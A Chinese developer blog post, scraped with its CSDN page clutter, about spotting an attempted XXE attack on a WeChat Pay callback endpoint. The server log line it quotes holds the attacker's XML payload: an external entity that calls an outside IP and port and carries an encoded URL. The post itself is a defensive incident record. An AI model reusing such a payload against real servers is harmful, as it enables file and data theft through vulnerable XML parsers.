记录一次系统入侵,微信支付回调

最新推荐文章于 2022-02-11 16:03:59 发布
最新推荐文章于 2022-02-11 16:03:59 发布
阅读量1.3k 收藏 2
点赞数 1
分类专栏: 微信
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_21019419/article/details/89081982
版权
本文记录了一次系统入侵事件,重点涉及微信支付回调接口的日志异常。作者发现潜在的XXE漏洞,并回忆起微信支付的漏洞警告。幸亏及时更新了SDK,避免了风险。为确保安全,推荐使用微信官方SDK并启用安全检测功能。
摘要由CSDN通过智能技术生成

早上检查系统日志,发现有很多打印

2019-04-08 03:15:34  [ http-bio-8080-exec-149:384527931 ] - [ WARN ] Invalid XML, can not convert to map. Error message: DOCTYPE is disallowed when the feature "http://apache.org/xml/features/disallow-doctype-decl" set to true.. XML content: <?xml version="1.0" encoding="utf-8"?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://101.91.62.170:4837/wx_xxe_dbc_os_2019040803_63?aHR0cDovL3d3dy5oYW5namlhbmV0LmNvbS93eHBheS9ub3RpZnk=">%xxe;]>

由于这个打印是在微信支付回调接口出现的,所以就引起了我的注意,看这个样子是有人要搞事情啊。
然后看到xxe这个有点熟悉,就想起前段时间微信的支付漏洞,要提示更新什么的,看看这篇文章:微信XXE漏洞
还好之前收到通知更新了sdk的。
如果要验证自己的微信支付是否存在这个问题,可以自己写一个入侵xxe的测试代码,或者去微信商户平台,然后在:产品中心-》安全医生

最低0.47元/天 解锁文章
林子曰
关注
专栏目录
【愚公系列】《AIGC辅助软件开发》011-AI辅助编写技术文档:技术文档
时光隧道
07-24 1万+
在当今快速发展的技术环境中,技术文档的编写变得愈加重要。无论是软件开发、产品设计,还是系统架构,清晰、准确的技术文档不仅能帮助团队成员快速理解项目,还能为用户提供必要的使用指导。然而,编写高质量的技术文档常常是一项繁琐且耗时的任务。随着人工智能技术的不断进步,AI工具的辅助作用逐渐显现,特别是在技术文档的编写过程中。借助AI,开发者和技术作家可以更高效地生成、编辑和维护文档,从而专注于更高层次的创作和思考。
微信支付回调,XXE攻击漏洞防止方法
dianhuoshu1349的博客
07-06 443
最近微信支付回调发现的XXE攻击漏洞(什么是XXE攻击,度娘、bing去搜,一搜一大把),收到通知后即检查代码, 微信给的解决方法是如果你使用的是: XmlDocument: XmlDocument xd = new XmlDocument { XmlResolver = null, }; 我们做微信支付没有使用他们的SDK,底层解析XML没有使用XmlD...
伪装微信支付回调通知支付安全
flysnownet的博客
05-11 1万+
原理 1.微信支付成功后,微信会给业务服务器发送回调通知,回调内容为一系列 参数的键值对参数按照key=value的格式,并按照参数名ASCII字典序排序生成字符串,然后用商户私钥对其进行签名,如MD5,并将签名撇接到字符串后,然后以XML方式发送给业务服务器,如果秘钥泄露,他人可任意伪造回调数据进行假通知,在业务服务器(1.没有更进一步判断IP是否来自微信服务器,2没有进行主动查询)的情况下订...
XML与MAP相互转换
D15306354614的博客
05-09 333
XML与MAP相互转换XML格式字符串转换为Map将Map转换为XML格式的字符串应用的包 XML格式字符串转换为Map /** * XML格式字符串转换为Map * * @param strXML XML字符串 * @return XML数据转换后的Map * @throws Exception */ public static Map<String, String> xmlToMap(String strXML) throw
JNDI RMI 注入(Log4j2漏洞)
sun0322
12-24 8581
目录 ■相关知识 1.SLF4J(Simple logging Facade for Java) // 简单日志门面 ■(log4j2)漏洞 ■JNDI 注入代码实现(RMI) ■代码细节说明 1.javax.naming.Reference // 构造方法 2.代码中使用的服务如何构建 SimpleHTTPServer // (Python)快速共享目录 3.RMI的利用版本限制 4.问答 5.RMI(Remote Method Invocation)为远程方法调用 ●在攻击..
XXE漏洞、原理、修复----微信支付捧红的老漏洞
chihejin3005的博客
07-05 344
今天突然接到微信支付的通知,紧急修复XXE漏洞。虽然已经工作多年但是对网络安全仅仅使了解皮毛,要想修复漏洞就要先搞清楚漏洞的基本执行原理。 1、XXE的背景 XML External Entity attack简称XXE,XML外部实体攻击。是利用 XML标准中外部通用解析...
微信支付_公众号支付:微信支付的支付流程与支付状态管理
## 1.1 介绍微信支付 微信支付是基于微信公众号或小程序的移动支付平台,于2013年底上线。它允许用户在微信中进行付款和转账操作,为用户提供便捷、快速、安全的支付体验。 ## 1.2 微信支付的重要性 随着移动支付...
三网免挂机轮询码支付系统源码
11-14
2. 后台服务:处理支付请求,与各大支付平台(如支付宝、微信支付等)接口对接,进行支付处理和状态查询。 3. 数据库:存储订单信息、用户信息、支付状态等数据,确保数据的安全性和一致性。 4. 轮询服务:定时查询...
我的小米智能家居系统
热门推荐
智能家居博客
01-03 3万+
科技、始终来自... 惰性 智能家居 Smart Home 已经不再是科幻片中的情节,目前海外各家厂商在这一块商机上头,无不卯足了劲在拚市场推商品,而呆湾呢~ 很奇怪、这个曾经是科技代工业、并且对技术上反应也快速的”科技岛”里头,这几年不只没什么人在推、 连媒体报导都不多,先找了只国外最近的介绍影片给大家瞧瞧好了~ https://youtu.be/hIEIGDsbKqY 国外这块发展非常的...
微信开发用到的常见的方法~~xmlToMap、MapToXml、签名等等
xiaozhegaa的博客
01-22 2万+
近日,在开发微信支付、微信退款、微信付款到零钱、微信订单查询、微信付款到银行卡的功能。以及其他微信API的使用。发现微信API的开发都是同样的套路~~封装参数–》包装成Xml—》提交到Api—》获取返回的内容就行了。因为会有多个API都设计到这些操作,特地抽取出来封装成工具类单独讲,学习完以下这5~8个放法、那么你的开发就很简便了 ~ ~ 一个支付方法简单的十五行代码立马搞定。希望对你们有帮助。个
微信公众号jsapi支付
点点滴滴
11-15 178
最近要弄个微信公众号支付,于是百度了很多,总结了一下 package com.github.lly835.controller.l; import java.text.SimpleDateFormat; import java.util.Date; import java.util.HashMap; import java.util.Map; import javax.servlet.http...
xml解析----元素类型 "XXXX" 必须由匹配的结束标记 "</XXXX>" 终止。
往前的娘娘
08-03 2万+
概述: 利用eclipse link 中moxy在弄微信的向微信写入数据。报错了。。。。 [Exception [EclipseLink-25004] (Eclipse Persistence Services - 2.7.0.v20170701-882318f): org.eclipse.persistence.exceptions.XMLMarshalException Exception
微信支付一次可以成功,后面一直报错
Allenpzq的博客
02-11 1412
微信支付
支付平台服务器被攻击怎么应对?
luolingfeng666的博客
05-25 1958
在商业部门,特别是在跨境电子商务中,支付和付款是不可或缺的。第三方和第四方支付遍地开花,造成了狼多肉少的情况,为市场占有量,不少人动起了歪脑筋,利用互联网攻击同行业务服务器(常见DDOS,CC攻击),让竞争对手业务瘫痪,从而坐收渔利,那么,被ddos,cc攻击后,该怎么应对呢? 需要一台能承受你现在攻击量的高防服务器,例如当你遇到200G流量攻击时,务必选择300G以上的防御,留下足够的空间,预防发生紧急情况。高防服务器昵称联系Q 一、DDos简介 DDoS(Distrib...
【WeChat】之 微信小程序登录(获得unionid)(Java版 加解密)
fanfan4569的博客
07-03 5838
前言 坑啊,都是坑啊,你最大。。。 开发平台不用认证,也能获取的到 用户的 unionid 前端 js 中不要写 https://api.weixin.qq.com/sns/jscode2session,微信已禁止 微信公众号、小程序、开发平台,一个对应着一个邮箱 未认证的开发平台,可以绑定小程序,不可以绑定公众号 未认证的开发平台,要获得union...
微信公众号支付回调验证详解与参数解析
在微信公众号支付场景中,一个关键环节是处理来自微信平台的支付回调通知。这个回调验证过程对于确保交易安全和正确处理用户支付至关重要。当用户通过公众号进行支付后,微信会发送一个HTTP请求到你的服务器,携带...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值